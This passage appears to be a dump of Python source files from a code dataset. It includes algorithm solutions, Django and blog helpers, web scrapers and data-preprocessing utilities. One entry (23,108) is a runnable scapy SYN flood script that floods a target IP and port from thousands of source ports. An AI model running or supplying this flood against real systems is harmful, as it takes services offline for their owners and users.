index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
23,100 | a5ecd1c97f54dbab3f1500677c6230da91ce45ad | """
There are some processes that need to be executed. Amount of a load that process causes on a server that runs it, is being represented by a single integer. Total load caused on a server is the sum of the loads of all the processes that run on that server. You have at your disposal two servers, on which mentioned processes can be run. Your goal is to distribute given processes between those two servers in the way that, absolute difference of their loads will be minimized.
Given an array of n integers, each of which represents the load caused by a successive process, return the minimum absolute difference of the two servers' loads.
Example 1:
Input: [1, 2, 3, 4, 5]
Output: 1
Explanation:
We can distribute the processes with loads [1, 2, 4] to the first server and [3, 5] to the second one,
so that their total loads will be 7 and 8, respectively, and the difference of their loads will be equal to 1.
"""
def solution(processes):
    """Split process loads across two servers, minimizing the absolute
    difference of their total loads.

    Classic partition problem: maximize one server's load up to half of
    the total. Find the largest achievable subset sum `best` not
    exceeding total // 2; the answer is total - 2 * best.

    BUGFIX: the original 2D DP only seeded capacity row 0 for the first
    process and iterated inner capacities from 2, so small capacities
    were never filled for later items (e.g. solution([1, 1]) returned 2
    instead of 0). Replaced with the standard 1-D subset-sum DP.

    O(n * total/2) time, O(total/2) extra space.
    """
    total = sum(processes)
    half = total // 2
    # reachable[w] -- can some subset of the processes sum exactly to w?
    reachable = [False] * (half + 1)
    reachable[0] = True
    for load in processes:
        # Iterate capacities downwards so each process is used at most once.
        for w in range(half, load - 1, -1):
            if reachable[w - load]:
                reachable[w] = True
    best = max(w for w in range(half + 1) if reachable[w])
    return total - 2 * best
23,101 | af4b704ec5d40ba64b56179b677176304e7e1922 | #!/usr/bin/python
def get_system_to_ip_map(system_names, system_ips):
    """Pair system names with their corresponding system IPs.

    Args:
        system_names: list of system names.
        system_ips: list of system IPs.

    Returns:
        List of (name, ip) tuples. If either input list is empty, an
        empty list is returned. With uneven lengths, the result is
        truncated to min(len(system_names), len(system_ips)).
    """
    if not system_names or not system_ips:
        # print() with a single argument behaves the same on Python 2 and 3.
        print("List is empty!!! Please enter some data")
        return []
    # zip stops at the shorter sequence, giving the min-length behavior
    # the original implemented with an explicit index loop.
    return list(zip(system_names, system_ips))
# --- Interactive entry point (Python 2: raw_input / print statement) ---
# Reads comma-separated system names and IPs from stdin, then prints the
# name->IP pairing.  NOTE(review): the "seperated"/"coma" typos are inside
# runtime prompt strings, so they are deliberately left untouched here.
_list = raw_input("Enter system names seperated by coma : ")
system_names = _list.split(',')
_list = raw_input("Enter system IPs seperated by coma : ")
system_ips = _list.split(',')
print get_system_to_ip_map(system_names, system_ips)
|
23,102 | 9e268a523c1d494d67223f70a36d9c50919eb1fc | #!/usr/bin/env python3
class SimpleContainsTest:
    """Demo container showing how `in`, iteration and indexing map onto
    __contains__, __iter__/__next__ and __getitem__ (each prints when
    invoked so the dispatch can be observed)."""

    def __init__(self, data):
        # data: the underlying sequence all protocol methods delegate to.
        self.data = data

    def __getitem__(self, i):
        print('getitem: ', i)
        # BUGFIX: the original returned self.item[i]; no `item` attribute
        # exists, so any indexing raised AttributeError.
        return self.data[i]

    def __iter__(self):
        # (Re)start iteration. The instance is its own iterator, so nested
        # or concurrent iterations share a single cursor.
        self.ix = 0
        return self

    def __next__(self):
        if self.ix == 0: print('start iteration')
        if self.ix == len(self.data): raise StopIteration
        item = self.data[self.ix]
        print('iter : ', end="")
        self.ix += 1
        return item

    def __contains__(self, x):
        print("contains:", end=' ')
        return x in self.data
if __name__ == '__main__':
    # Exercise the container protocols: membership test, then iteration.
    sample = SimpleContainsTest(['a', 'b', 'c', 'd', 'z'])
    print('z' in sample)
    for element in sample:
        print(element, '|', end=' ')
23,103 | d234140263026fff68b5dbf0e01263382de3390c |
def number_pairs(txt):
    """Parse a space-separated string whose first token is a count header
    and return how many complete pairs of equal values the remaining
    numbers form."""
    values = [int(token) for token in txt.split(' ')][1:]
    return sum(values.count(v) // 2 for v in set(values))
|
23,104 | df5c6f4b7c6aa50aa5658167bbd643a8036e0bf7 | """
1425. Constrained Subsequence Sum
Hard
Given an integer array nums and an integer k, return the maximum sum of a non-empty subsequence of that array such that for every two consecutive integers in the subsequence, nums[i] and nums[j], where i < j, the condition j - i <= k is satisfied.
A subsequence of an array is obtained by deleting some number of elements (can be zero) from the array, leaving the remaining elements in their original order.
Example 1:
Input: nums = [10,2,-10,5,20], k = 2
Output: 37
Explanation: The subsequence is [10, 2, 5, 20].
Example 2:
Input: nums = [-1,-2,-3], k = 1
Output: -1
Explanation: The subsequence must be non-empty, so we choose the largest number.
Example 3:
Input: nums = [10,-2,-10,-5,20], k = 2
Output: 23
Explanation: The subsequence is [10, -2, -5, 20].
Constraints:
1 <= k <= nums.length <= 10^5
-10^4 <= nums[i] <= 10^4
"""
from typing import List
import collections
import heapq
"""
IF SKIP, then can skip k-1 consecutive elts
k=1: cannot have skips/holes.
k=2: can skip over 1 at a time
k=3: can skip over 2 at a time.
"""
###############################################################################
"""
Solution: DP w/ decreasing deque of positive values.
Same dp relations as in sol 2.
Size of deque is not necessarily always k.
O(n) time: each element is pushed and popped at most once.
O(n) extra space: for dp array
O(k) extra space: for deque
"""
class Solution:
    def constrainedSubsetSum(self, arr: List[int], k: int) -> int:
        """DP with a decreasing deque of positive dp values.

        best[i] = max constrained subsequence sum ending at index i.
        The deque front always holds max(best[j]) for j in [i-k, i),
        restricted to positive values (non-positive prefixes never help).
        O(n) time (each value pushed/popped at most once), O(n) space.
        """
        n = len(arr)
        # Each element on its own is a valid subsequence -- this matters
        # when every value is negative.
        best = arr[:]
        window = collections.deque()
        for i in range(n):
            # Front of the deque is the best positive predecessor sum.
            if window:
                best[i] += window[0]
            # Keep the deque decreasing: best[i] is newer, so anything
            # smaller behind it can never be the window maximum again.
            while window and best[i] > window[-1]:
                window.pop()
            if best[i] > 0:
                window.append(best[i])
            # best[i-k] leaves the window for the next iteration.
            if i >= k and window and window[0] == best[i - k]:
                window.popleft()
        return max(best)
"""
Solved it with DP between two positive numbers (mixture of stepping stairs
with sliding window (using multiset)) to find the element to go to such that
the negative cost is minimum. If negative cost > positive sum till now then
initialize the positive sum to 0 (Kadane's algorithm).
"""
###############################################################################
"""
Solution 2: DP w/ max heap.
Let dp[i] be the max constrained subset sum of elements up to index i,
with dp[i] necessarily including a[i]. Then
dp[i] = max(dp[j] + a[i]) = a[i] + max(dp[j]) for j in [i - k, i).
Hence we need to maintain the max of the last k computed dp elements.
It's easy with a max heap of pairs (dp[j], j).
Just remove the top if it is too old.
Alternatively, can find max dp in range using segment tree (range max query).
This results in same time complexity.
O(n log n) time
O(n) extra space: for dp array and heap
"""
class Solution2:
    def constrainedSubsetSum(self, arr: List[int], k: int) -> int:
        """DP with a max heap, simulated by a min heap of negated values.

        dp[i] = arr[i] + max(0, max(dp[j]) for j in [i-k, i)).

        BUGFIX: the original pushed (dp[i], i) straight into heapq, which
        is a *min* heap, so h[0][0] was the minimum of the window, not the
        maximum (it returned 20 instead of 37 for LC example 1). Storing
        (-dp[i], i) restores max-heap behavior; stale entries (index
        < i - k) are discarded lazily from the top.

        O(n log n) time, O(n) extra space (dp array + heap).
        """
        n = len(arr)
        dp = arr[:]  # dp[i] defaults to arr[i] alone (all-negative case)
        h = []  # min heap of (-dp[j], j) == lazy max heap over dp values
        for i in range(n):
            # Drop heap tops whose index fell out of the [i-k, i) window.
            while h and h[0][1] < i - k:
                heapq.heappop(h)
            if h:
                # -h[0][0] is the max dp[j] within the window.
                dp[i] = max(dp[i], arr[i] - h[0][0])
            heapq.heappush(h, (-dp[i], i))
        return max(dp)
###############################################################################
"""
Solution 3: DP with inner loop to find max of previous dp's within range k.
O(n*k) time
O(n) extra space: for dp array
TLE
"""
class Solution3:
    def constrainedSubsetSum(self, arr: List[int], k: int) -> int:
        """Brute-force DP: for each index, scan the previous k dp values.

        O(n*k) time, O(n) extra space. TLE on LeetCode; kept as the
        reference implementation.
        """
        n = len(arr)
        best = arr[:]
        for i in range(n):
            # Best predecessor within the window [max(i-k, 0), i);
            # an empty or non-positive window contributes nothing.
            prev_best = max(best[max(i - k, 0):i], default=0)
            if prev_best > 0:
                best[i] = arr[i] + prev_best
        return max(best)
###############################################################################
if __name__ == "__main__":
    def test(arr, k, comment=None):
        # Pretty-print one test case and the chosen solver's result.
        print("="*80)
        if comment:
            print(comment)
        print(f"\narr = {arr}")
        print(f"k = {k}")
        res = sol.constrainedSubsetSum(arr, k)
        print(f"\nres = {res}\n")

    sol = Solution()  # DP w/ decreasing deque of positive values
    #sol = Solution2()  # DP w/ max heap
    #sol = Solution3()  # DP with inner loop over previous k dp values

    # (comment, arr, k) triples -- same cases, same order as before.
    cases = [
        ("LC ex1; answer = 37", [10, 2, -10, 5, 20], 2),
        ("LC ex2; answer = -1", [-1, -2, -3], 1),
        ("LC ex3; answer = 23", [10, -2, -10, -5, 20], 2),
    ]
    for comment, arr, k in cases:
        test(arr, k, comment)
|
def sum_2_num(num1, num2):
    """Return the sum of two numbers.

    :param num1: first addend
    :param num2: second addend
    :return: num1 + num2
    """
    # The original bound the result to a local named `sum`, shadowing the
    # builtin; return the expression directly instead.
    return num1 + num2
# Use a variable to receive the function's return value.
result = sum_2_num(50, 20)
# NOTE(review): output string is user-facing Chinese ("result is: %.2f")
# and is left untouched.
print("计算结果为:%.2f" % result)
|
23,106 | fd1f58eb561ea52fc0c4c527b1f7d71a27cbaac6 | from django.shortcuts import redirect, get_object_or_404
from functools import wraps
from apps.projects.models import Task, Project, Discussion
def has_access_project(redirect_url=None, klass=None):
    """Decorator factory restricting a view to projects the user may access.

    Parameters:
        redirect_url: URL to redirect to when access is denied.
        klass: model class to fetch (Project, Task or Discussion); its pk
            is taken from the `pk` arg or the `<klass>_id` kwarg.

    The wrapped view is invoked as function(request, pk, obj, *args,
    **kwargs), where obj is the fetched model instance, or None when no
    klass was given.
    """
    def decorator(function):
        def _control(request, pk=None, *args, **kwargs):
            # `obj` replaces the original local named `object`, which
            # shadowed the builtin.  BUGFIX: with klass=None the original
            # accidentally passed the *builtin* `object` class to the
            # view; pass None instead.
            obj = None
            if klass:
                id_key = klass.__name__.lower() + '_id'
                pk = pk or kwargs.get(id_key)
                obj = get_object_or_404(klass, pk=pk)
                if klass == Project:
                    if obj not in request.user.projects:
                        return redirect(redirect_url)
                elif klass == Task or klass == Discussion:
                    # Tasks and discussions inherit access from their project.
                    if obj.project not in request.user.projects:
                        return redirect(redirect_url)
            return function(request, pk, obj, *args, **kwargs)
        return wraps(function)(_control)
    return decorator
23,107 | 5f4363e84f13c2e08caa29979355158642767afe | from random import randint
def maximum_pairwise_product(nums):
    """Brute-force O(n^2) reference: try every pair and keep the largest
    product seen, starting from 0 (so an all-negative-product input
    yields 0, matching the original)."""
    best = 0
    for i, a in enumerate(nums):
        for b in nums[i + 1:]:
            product = a * b
            if product > best:
                best = product
    return best
def maximum_pairwise_product_fast(seq):
    """Single-pass O(n): track the two largest elements and return their
    product. Handles duplicates correctly (e.g. [5, 5] -> 25)."""
    top = runner_up = float("-inf")
    for value in seq:
        if value > top:
            # New maximum: previous maximum becomes the runner-up.
            top, runner_up = value, top
        elif value > runner_up:
            runner_up = value
    return runner_up * top
def main():
    """Endless randomized stress test comparing the naive and fast
    implementations; stops only when they disagree."""
    while True:
        size = randint(2, 60)
        values = [randint(1, 10000) for _ in range(size)]
        slow = maximum_pairwise_product(values)
        fast = maximum_pairwise_product_fast(values)
        print(size)
        print(values)
        if slow != fast:
            print('Wrong!!!', slow, fast)
            break
        print("Ok", slow, fast)

if __name__ == '__main__':
    main()
|
#! /usr/bin/env python
# Security in Computer Systems 2018 - SDU.
# Multiple port SYN Flood Attack.
# @CarlosViescasHuerta.
#
# WARNING(review): this is a denial-of-service tool.  It must only be run
# against systems you own or are explicitly authorized to test (e.g. a
# course lab network); use against third parties is illegal.
# Usage: script.py <src_ip> <dst_ip> <dst_port>
import sys
from scapy.all import *
# Establish source and target IPs from input arguments
src_ip = sys.argv[1]
dst_ip = sys.argv[2]
dst_port = int(sys.argv[3])
print ("Launching DoS to http://" + dst_ip + ":" + str(dst_port))
# Set counter
i = 0
try:
    while True:
        # Flood from multiple ports
        for port in range(5001, 50000):
            i = i + 1
            # Set addresses and send packets
            _ip = IP(src=src_ip, dst=dst_ip)
            _tcp = TCP(sport=port, dport=dst_port)
            packet = _ip / _tcp
            send(packet, inter = .001)
            # Print & Update
            print ("Port: " + str(port) + ". Sent packet # " + str(i))
except KeyboardInterrupt:
    # Ctrl-C ends the flood and reports the total.
    print ("\n \n \n \n \n \n \n \n \n \n \n")
    print ("SYN Flood interrupted. Total packets sent: " + str(i))
23,109 | 0889c76fd3c8a12fa361817a0ebb304e6ce48642 | import requests
from bs4 import BeautifulSoup
from cts.menu import Menu, Beer
BASE_URL = "http://www.dryhopchicago.com/drink/beer/"
def get_menu_html():
    """Fetch the raw beer-menu page; returns the requests Response object."""
    return requests.get(BASE_URL)
def parse_menu_html(html):
    """Parse the drink-menu page (a requests Response) into a Menu.

    The update date is the last word of the <strong> inside the
    menu-content <span>; the beers live in the <ul> with an empty id.
    """
    soup = BeautifulSoup(html.content, "lxml")
    menu_div = soup.find("div", {"class": "menu-content"})
    update_date = menu_div.find("span").find("strong").get_text().split(" ")[-1]
    entries = soup.find("ul", {"id": ""}).find_all("li")
    entries.pop()  # drop the trailing non-beer <li>
    return Menu(update_date, parse_beers(entries))
def parse_beers(beer_list):
    """Convert <li> menu entries into Beer objects.

    Each entry holds the name in <h3> and two <p> tags: the first is
    "style — abv", the second the description.
    """
    parsed = []
    for entry in beer_list:
        title = entry.find("h3").get_text().strip()
        paragraphs = entry.findAll("p")
        style_line = paragraphs[0].get_text()
        parsed.append(Beer(title,
                           style_line.split("—")[0],
                           style_line.split("—")[1],
                           paragraphs[1].get_text()))
    return parsed
def get_menu():
    """Fetch and parse the current beer menu in one call."""
    return parse_menu_html(get_menu_html())
|
import sqlite3
import ssl
import urllib.request, urllib.parse, urllib.error

# Ignore SSL certificate errors.
# NOTE(review): this context (and the urllib imports) are prepared but
# never used below -- presumably leftovers from a download step; kept
# untouched in case other code relies on them.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE

conn = sqlite3.connect('bkfood.sqlite')
cur = conn.cursor()

cur.execute('''
CREATE TABLE IF NOT EXISTS Food (
    id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,
    item TEXT,
    serving_size INTEGER,
    calories FLOAT,
    fat_cal FLOAT,
    protein FLOAT,
    fat FLOAT,
    sat_fat FLOAT,
    trans_fat FLOAT,
    chol FLOAT,
    sodium FLOAT,
    carbs FLOAT,
    fiber FLOAT,
    sugar FLOAT,
    meat INTEGER);''')

fh = open("burger-king-items.txt")
print('Loading BK Items into database')
for line in fh:
    # Skip the header row.
    if line.startswith('Item'):
        continue
    words = line.split()
    # BUGFIX: the original compared each field against None, but
    # str.split() never yields None -- that check could never trigger,
    # and short lines raised IndexError on words[13] instead.  A
    # complete record has at least 14 whitespace-separated fields.
    if len(words) < 14:
        continue
    # Fields, in order: item, serving_size, calories, fat_cal, protein,
    # fat, sat_fat, trans_fat, chol, sodium, carbs, fiber, sugar, meat.
    cur.execute('''INSERT OR IGNORE INTO Food (item, serving_size, calories, fat_cal, protein, fat, sat_fat, trans_fat, chol, sodium, carbs, fiber, sugar, meat)
        VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ? )''', tuple(words[:14]))
fh.close()
print('Items loaded successfully into database')
conn.commit()
cur.close()
conn.close()
|
23,111 | 05c84dc2169d5f2f83a2a44e5ed282afce22e144 | from django import forms
from django.utils.safestring import mark_safe
from sphene.community.middleware import get_current_user, get_current_sphdata, get_current_urlconf
from sphene.community.sphutils import sph_reverse
from sphene.community.models import Tag, TagLabel, TaggedItem, tag_set_labels, tag_get_labels
from sphene.community.fields import TagField
from sphene.community.widgets import TagWidget
from sphene.sphboard.models import Post
from sphene.sphboard.views import PostForm
from sphene.sphboard.categorytyperegistry import CategoryType, register_category_type
from sphene.sphblog.models import BlogPostExtension, BLOG_POST_STATUS_CHOICES, BlogCategoryConfig
from sphene.sphblog.utils import slugify
class BlogPostForm(PostForm):
    """Board post form extended with blog-specific fields.

    Adds a slug (auto-generated from the subject when left blank), a
    publication status and free-form tags on top of the regular
    sphboard PostForm.
    """
    slug = forms.CharField(required = False,
                           help_text = "Optionally define a slug for this blog post. Otherwise it will be filled automatically.")
    status = forms.ChoiceField(choices = BLOG_POST_STATUS_CHOICES,
                               initial = 2)
    tags = TagField(model = Post, required = False)

    def clean_slug(self):
        # A subject is required to derive a slug when none was entered.
        if not 'subject' in self.cleaned_data:
            raise forms.ValidationError( 'No subject to generate slug.' )
        slug = self.cleaned_data['slug']
        if slug == '':
            slug = slugify(self.cleaned_data['subject'], model=BlogPostExtension)
        else:
            # Pass the existing extension id so the uniqueness check does
            # not collide with this post's own slug when editing.
            slug = slugify(slug, model=BlogPostExtension, pk=self.__ext_id)
        return slug

    def init_for_category_type(self, category_type, post):
        # Pre-populate blog fields when editing an existing post.
        # NOTE(review): __ext_id stays None for brand-new posts; clean_slug
        # relies on init_for_category_type having run first -- confirm.
        self.__ext_id = None
        super(BlogPostForm, self).init_for_category_type(category_type, post)
        if post:
            try:
                ext = post.blogpostextension_set.get()
                self.__ext_id = ext.id
                self.fields['tags'].initial = tag_get_labels(post)
                self.fields['slug'].initial = ext.slug
                self.fields['status'].initial = ext.status
            except BlogPostExtension.DoesNotExist:
                # This can happen after post was created for
                # attaching a file.. which wouldn't create a BlogPostExtension.
                pass
class BlogCategoryType(CategoryType):
    """Category type that presents a sphboard category as a blog.

    Blog entries are top-level board posts carrying a BlogPostExtension
    (slug + status) and tag labels; replies use the plain PostForm.
    """
    name = "sphblog"
    label = "Blog Category"

    def get_post_form_class(self, replypost, editpost):
        # Replies (and edits of replies) use the default board form; new
        # top-level entries get the blog form.
        if replypost is not None and \
           (editpost is None or editpost.thread is not None):
            # If we are posting a reply, use the default PostForm
            return PostForm
        return BlogPostForm

    def save_post(self, newpost, data):
        # Persist board-level data first, then the blog extension.
        super(BlogCategoryType, self).save_post(newpost, data)
        if newpost.thread is not None:
            # Replies carry no blog extension -- nothing more to do.
            return
        try:
            ext = newpost.blogpostextension_set.get()
        except BlogPostExtension.DoesNotExist:
            ext = BlogPostExtension( post = newpost, )
        ext.slug = data['slug']
        ext.status = data['status']
        ext.save()
        tag_set_labels( newpost, data['tags'] )
        if newpost.is_new_post:
            try:
                config = BlogCategoryConfig.objects.get( \
                    category = self.category)
                if config.enable_googleblogping:
                    # If enabled, ping google blogsearch.
                    # NOTE(review): Python 2 API (urllib.urlencode /
                    # urllib.urlopen); this branch fails on Python 3.
                    import urllib
                    url = self.category.group.get_baseurl()
                    blog_feed_url = sph_reverse('sphblog-feeds', urlconf=get_current_urlconf(), kwargs = { 'category_id': self.category.id })
                    pingurl = 'http://blogsearch.google.com/ping?%s' % \
                        urllib.urlencode( \
                            { 'name': self.category.name,
                              'url': ''.join((url, self.category.get_absolute_url()),),
                              'changesURL': ''.join((url, blog_feed_url),) } )
                    urllib.urlopen( pingurl )
            except BlogCategoryConfig.DoesNotExist:
                # No per-category config -> no ping.
                pass

    def get_absolute_url_for_post(self, post):
        # Blog posts resolve through their extension's canonical URL.
        return post.get_thread().blogpostextension_set.get().get_absolute_url()

    def append_edit_message_to_post(self, post):
        # Only replies get the "edited" note appended.
        return post.thread is not None

    def get_show_thread_template(self):
        return 'sphene/sphblog/show_blogentry_layer.html'

    def get_absolute_url_for_category(self):
        # Reverse the blog index URL; None signals "no URL available".
        try:
            blog_url = sph_reverse('sphblog_category_index_slug', kwargs = { 'category_slug': self.category.slug })
            return blog_url
        except Exception as e:
            #print "err.. argl %s" % str(e)
            return None
class HiddenBlogCategoryType(BlogCategoryType):
    """Blog category variant that is excluded from forum overview pages."""
    name = "sphbloghidden"
    label = "Blog Category hidden from forum overviews"

    def is_displayed(self):
        # Hide this category from board index listings.
        return False
|
23,112 | a1a49ac0c2abbd0a67158164cb194bf0c11f97b8 |
def prime(x):
    """Return True if x is a prime number, else False.

    Trial division up to sqrt(x): any factor above the square root pairs
    with one below it, so checking beyond is redundant.  The original
    scanned all of range(2, x) and contained dead code (a `break` after
    `return` and a no-op `else: continue`); results are unchanged.
    """
    if x <= 1:
        return False
    for n in range(2, int(x ** 0.5) + 1):
        if x % n == 0:
            return False
    return True
# --- Driver script ---
# Read integers from stdin until a 0 is entered, collecting them in d.
n=int(input())
d=[]
count =0
while n != 0:
    d.append(n)
    if n == 0 :
        # Unreachable: the loop condition already excludes 0.
        break
    else:
        n = int(input())
        continue
# Count primes among the inputs.
# NOTE(review): the inner range(i, i*2+1) makes each prime d[i] contribute
# i+1 to the count instead of 1 -- this looks like a bug, but the intended
# weighting is unclear from here, so it is only flagged, not changed.
for i in range(len(d)):
    for j in range(i, i*2+1):
        if prime(d[i]) == True:
            count+=1
        else:
            continue
print(count)
|
23,113 | 87115a99b027a58ab7ae385aaa4d0edbb37cc05e | from selenium import webdriver
import time
import re
import os
from bs4 import BeautifulSoup
import pyautogui
import pyperclip
from lxml import etree
import datetime
import requests
from selenium.common.exceptions import TimeoutException
class Crawl_141jav:
    """Selenium-based crawler that saves cover images from 141jav.com into
    per-date folders, keeping a history.txt of already-downloaded names.

    NOTE(review): documentation-only pass; code is unchanged. Runtime
    strings (including Chinese console messages) are left untouched.
    """

    def main(self, Dir='F:\\pic\\141jav\\', startTime= datetime.date.today()):
        # Dir: destination root folder.
        # startTime: crawl backwards from today down to this 'YYYY/M/D'
        # date; the default (today) means "crawl the full history".
        #custom_path = 'F:\\pic\\141jav\\'
        custom_path = Dir
        url = 'https://www.141jav.com/date/'
        # Request headers -- unused below; presumably left over from an
        # earlier requests-based download path (see commented code).
        header = {
            'authority': 'pics.dmm.co.jp: method: GET: path: / mono/movie/adult/h_283pym342/h_283pym342pl.jpg: scheme: https', 'accept': 'text/html, application/xhtml+xml, application/xml;q = 0.9, image/webp, image/apng, */*;q = 0.8, application/signed-exchange;v = b3;q = 0.9', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'zh-CN, zh;q = 0.9', 'cache-control': 'max-age = 0', 'cookie': 'app_uid = ygb2Cl7o451QgzBdxXNMAg ==', 'if-modified-since': 'Mon, 11 May 2020 07: 05: 40 GMT', 'if-none-match': "5eb8f944-34473", 'referer': 'https: // www.141jav.com/date/2020/06/16?page = 1', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'user-agent': 'Mozilla/5.0 (Windows NT 10.0 Win64 x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36'
        }
        # Headless Chrome with DevTools logging noise suppressed.
        chrome_opts = webdriver.ChromeOptions()
        chrome_opts.add_argument("--headless")
        chrome_opts.add_experimental_option('excludeSwitches', ['enable-logging'])

        def timeCount(flag, EndTime='2014/6/6'):
            # Build the list of date path segments ('YYYY/MM/DD'), newest
            # first, from today back to EndTime (flag == 0) or back to the
            # site's first day, 2014-06-25 (flag != 0).
            timeList = []
            begin = datetime.date(2014, 6, 25)
            if flag == 0:
                year = int(EndTime.split('/')[0])
                month = int(EndTime.split('/')[1])
                date = int(EndTime.split('/')[2])
                end = datetime.date(year, month, date)
            else:
                end = datetime.date.today()
            for i in range((end - begin).days+1):
                day = begin + datetime.timedelta(days=(end - begin).days-i)
                timeList.append(str(day).replace("-", "/"))
            return timeList

        def scrapy():
            # Main crawl loop: one date per iteration, paging until empty.
            if startTime == datetime.date.today():
                timeList = timeCount(1)
            else:
                timeList = timeCount(0,startTime)
            driver = webdriver.Chrome(options=chrome_opts)
            # Load previously downloaded names so they can be skipped.
            Exist = []
            if os.path.exists(custom_path + 'history.txt'):
                with open(custom_path + 'history.txt','r+') as f:
                    lines = f.readlines()
                    for line in lines:
                        Exist.append(line.replace("\n",""))
                    f.close()
            for date in timeList:
                try:
                    driver.set_page_load_timeout(10)
                    # Retry the date page until it loads within the timeout.
                    while True:
                        try:
                            driver.get(url+date)
                            break
                        except TimeoutException:
                            # Message: "load timed out, refreshing, wait 3s"
                            print("加载超时,启动F5刷新,等待3秒")
                            # pyautogui.click(x=509, y=33)
                            # pyautogui.hotkey('f5')
                            # driver.get(url+date)
                            driver.refresh()
                            time.sleep(3)
                    # Ensure destination folders exist (root + per-date).
                    if not os.path.exists(custom_path):
                        os.mkdir(custom_path)
                    if not os.path.exists(custom_path+date.replace('/','-')+'\\'):
                        os.mkdir(custom_path+date.replace('/', '-')+'\\')
                    videoNumber = 0
                    for page in range(100):
                        try:
                            driver.set_page_load_timeout(10)
                            # Retry each results page on timeout as well.
                            while True:
                                try:
                                    driver.get(url+date+'?page='+str(page+1))
                                    break
                                except TimeoutException:
                                    print("加载超时,启动F5刷新,等待3秒")
                                    # pyautogui.click(x=509, y=33)
                                    # pyautogui.hotkey('f5')
                                    driver.refresh()
                                    time.sleep(3)
                            content = driver.page_source.encode('utf-8')
                            html = etree.HTML(content)
                            soup = BeautifulSoup(content, 'lxml')
                            # Cover image URLs on this page.
                            href = [x.attrib['src'] for x in html.xpath("//img[@class='image']")]
                            videoNumber += len(href)
                            if len(href) == 0:
                                # Empty page -> done with this date.
                                print("%s 共 %d 部片!" % (date, videoNumber))
                                break
                            # Titles matching the images, newline-stripped.
                            name = [x.text.replace("\n", "") for x in html.xpath(
                                "//h5[@class='title is-4 is-spaced']/a")]
                            # Second browser used solely to screenshot images.
                            driver_info = webdriver.Chrome(options=chrome_opts)
                            for i in range(len(href)):
                                if name[i] in Exist:
                                    # Already downloaded in a previous run.
                                    print('%s 已经存在!' % (name[i]))
                                    continue
                                driver_info.get(href[i])
                                img = driver_info.find_element_by_xpath("//html/body/img")
                                # Save the rendered image as a screenshot.
                                img.screenshot(custom_path + date.replace('/', '-')+'\\' + name[i] + '.jpg')
                                # pyautogui.rightClick(x=500, y=500)
                                # pyautogui.typewrite(['V'])
                                # time.sleep(2)
                                # pyperclip.copy(custom_path + date.replace('/', '-')+'\\' + name[i] + '.jpg')
                                # pyautogui.hotkey('ctrlleft', 'V')
                                # time.sleep(1)
                                # pyautogui.press('enter')
                                # time.sleep(1)
                                # while True:
                                #     try:
                                #         r = requests.get(href[i], headers=header)
                                #         r.raise_for_status()
                                #         break
                                #     except:
                                #         print("timeout")
                                # with open(date.replace('/', '-')+'\\' + name[i] + '.jpg', 'wb') as f:
                                #     f.write(r.content)
                                #     f.close()
                                # Poll the folder until the file shows up,
                                # then append the name to history.txt.
                                while True:
                                    filelist = os.listdir(custom_path+date.replace('/', '-')+'\\')
                                    if name[i] + '.jpg' in filelist:
                                        with open(custom_path + 'history.txt', 'a+') as f:
                                            f.writelines(name[i])
                                            f.writelines('\n')
                                            f.close()
                                        print("%s 下载完成!" % (name[i]))
                                        break
                                    else:
                                        print("等待响应")
                                        time.sleep(2)
                                # pyautogui.hotkey('ctrlleft', 'V')  # paste
                                # time.sleep(1)
                                # pyautogui.press('enter')  # confirm
                                # time.sleep(1)
                                # print("file not seen")
                                time.sleep(0.5)
                            driver_info.quit()
                        except:
                            # NOTE(review): bare except also hides real bugs;
                            # treated here as "no more pages for this date".
                            print("%s 共 %d 页结束!" % (date, page+1))
                            break
                except:
                    # Date page never loaded -- assume not published yet.
                    print("%s 还未发布!"%(date))
                    continue
        scrapy()
|
23,114 | b9943830cb5f1e9f0667d8d6fccc3b2f06e14cb1 | '''
Script implements several preprocessing and evaluation steps that have to be done for the triplet loss network
'''
## Imports
import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
from tqdm import tqdm
from sklearn.model_selection import train_test_split
from sklearn.metrics import plot_confusion_matrix
from sklearn.metrics import balanced_accuracy_score, precision_score, recall_score, f1_score, classification_report, confusion_matrix, roc_curve, auc
from sklearn.preprocessing import OrdinalEncoder
from collections import Counter
def tackle_distribution_shift(data:pd.DataFrame, approach:str = "reuse") -> pd.DataFrame:
    '''
    balance the number of samples per class to tackle distribution shift

    Parameters:
        - data: data with distribution shift; must have a "Label" column [pandas.DataFrame]
        - approach: strategy to tackle the distribution shift [String]
            - 'reuse' (default): oversample every class up to the most common class size
            - 'mix': resample every class to the median class size
            - 'constrain': undersample every class down to the least common class size
    Returns:
        - df: data without distribution shift, index reset [pandas.DataFrame]
    '''
    ## work on a copy so the caller's frame stays untouched
    df = data.copy()
    labels = df.loc[:, "Label"]
    ## (label, count) pairs, most common first
    counted_labels = Counter(labels).most_common()
    if approach == "reuse":
        ## appearance count of the most common label
        sample_size = counted_labels[0][1]
    elif approach == "mix":
        ## median class size (len * 0.5 truncated, as before)
        sample_size = counted_labels[len(counted_labels) // 2][1]
    elif approach == "constrain":
        ## appearance count of the least common label
        sample_size = counted_labels[-1][1]
    else:
        ## BUGFIX: message previously said 'resue'
        print("approach not implemented (yet)! Using 'reuse' instead!")
        sample_size = counted_labels[0][1]
    ## sample each class to the common size (with replacement, so classes
    ## smaller than sample_size can be oversampled)
    sampled_data = [df[df.Label == label].sample(n = sample_size, replace = True)
                    for label in np.unique(labels)]
    return pd.concat(sampled_data).reset_index(drop = True)
def encode_objects(data:pd.DataFrame, ignore_columns:list = [], how:str = "binarizer") -> pd.DataFrame:
    '''
    encode every object (string) column of the given dataset into numerical data

    Parameters:
        - data: DataFrame to analyse [pandas.DataFrame]
        - ignore_columns: columns to leave untouched [List, default = []]
        - how: encoding strategy [String]
            - 'binarizer' (default): one 0/1 column per unique value via pandas.get_dummies()
